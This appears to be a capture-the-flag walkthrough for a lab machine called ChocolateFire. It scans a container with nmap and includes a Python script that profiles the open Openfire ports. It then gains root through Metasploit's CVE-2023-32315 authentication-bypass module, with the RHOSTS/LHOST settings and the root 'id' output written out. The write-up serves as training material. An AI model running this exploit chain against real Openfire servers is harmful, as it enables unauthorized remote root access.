ChocolateFire

1. Network Enumeration

Performing a Full Port Scan

export TARGET_IP=172.17.0.3
sudo nmap -p- $TARGET_IP

Scan Results:

The scan identifies multiple open ports, including SSH (22/tcp) and several XMPP-related services:

Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
7070/tcp open realserver
7777/tcp open cbt
9090/tcp open zeus-admin
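The inference that this host runs Openfire rests on the port pattern rather than on nmap's SERVICE column, which in a plain `-p-` scan is a table lookup by port number (hence labels like "hpvirtgrp" and "zeus-admin"), not a fingerprint. The script below is an added example, not part of the original write-up: it parses the scan output above (embedded as constructed sample input) and compares the open ports against a mapping of Openfire's default listeners, which is an assumption taken from Openfire's stock configuration and may differ on a customised install. It also flags whether the admin console port is reachable, since that is the management surface an operator would normally restrict to trusted networks.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample input: the nmap output from the scan above, embedded
# so the script runs offline without touching any host.
NMAP_OUTPUT = """\
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
7070/tcp open realserver
7777/tcp open cbt
9090/tcp open zeus-admin
"""

# Assumed mapping of Openfire's default listener ports (from Openfire's stock
# configuration; an assumption of this example, not something stated on the page).
OPENFIRE_DEFAULT_PORTS = {
    5222: "XMPP client-to-server",
    5223: "XMPP client-to-server (legacy SSL)",
    5262: "connection manager",
    5263: "connection manager (SSL)",
    5269: "XMPP server-to-server",
    5270: "XMPP server-to-server (SSL)",
    5275: "external component",
    5276: "external component (SSL)",
    7070: "HTTP binding (BOSH)",
    7443: "HTTPS binding (BOSH)",
    7777: "file transfer proxy",
    9090: "admin console (HTTP)",
    9091: "admin console (HTTPS)",
}
ADMIN_CONSOLE_PORTS = {9090, 9091}

# One nmap "normal output" port line: "<port>/<proto> <state> <service>".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, proto, state, service) for every port line in nmap normal output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def profile_openfire(rows: List[Tuple[int, str, str, str]]) -> Dict[str, object]:
    """Compare open TCP ports against the assumed Openfire defaults.

    The SERVICE column is deliberately ignored: without -sV it is only a
    port-number table guess, so "cbt" or "zeus-admin" say nothing about
    what is actually listening.
    """
    open_tcp = sorted({p for p, proto, state, _ in rows if proto == "tcp" and state == "open"})
    matched = {p: OPENFIRE_DEFAULT_PORTS[p] for p in open_tcp if p in OPENFIRE_DEFAULT_PORTS}
    other = [p for p in open_tcp if p not in OPENFIRE_DEFAULT_PORTS]
    return {
        "matched": matched,
        "other_open": other,
        # share of the known Openfire listeners that are exposed
        "coverage": len(matched) / len(OPENFIRE_DEFAULT_PORTS),
        # heuristic threshold chosen for this example; tune to taste
        "likely_openfire": len(matched) >= 4,
        "admin_console_exposed": any(p in ADMIN_CONSOLE_PORTS for p in matched),
    }


def report(text: str) -> str:
    """Human-readable summary of the profile for one scan."""
    prof = profile_openfire(parse_nmap(text))
    lines = [f"likely Openfire: {prof['likely_openfire']} (coverage {prof['coverage']:.0%})"]
    for port, role in prof["matched"].items():  # type: ignore[union-attr]
        lines.append(f"  {port}/tcp  {role}")
    if prof["admin_console_exposed"]:
        lines.append("  ! admin console reachable: restrict to management networks, verify with -sV")
    if prof["other_open"]:
        lines.append(f"  other open ports not explained by Openfire: {prof['other_open']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(NMAP_OUTPUT))
```

Run it against a saved scan with `python3 profile.py` (or feed a different file into `parse_nmap`); the useful follow-up is an `nmap -sV` on the matched ports to replace the table guesses with real banners before concluding anything about versions.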

2. Exploitation: Openfire Authentication Bypass (CVE-2023-32315)

Given the presence of Openfire, we check for known vulnerabilities. One such critical vulnerability is CVE-2023-32315, which allows for authentication bypass and remote code execution (RCE).

Using Metasploit to Exploit the Vulnerability

Metasploit contains an exploit module for this vulnerability. We proceed as follows:

  1. Launch Metasploit:

    msfconsole -q
  2. Search for Openfire exploits:

    msf6 > search openfire
  3. Select the relevant exploit module:

    msf6 > use exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
  4. Configure the exploit options:

    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options
    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set RHOSTS 172.17.0.3
    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set LHOST 172.17.0.1
  5. Execute the exploit:

    msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run

Upon successful exploitation, we confirm root access:

id
# uid=0(root) gid=0(root) groups=0(root)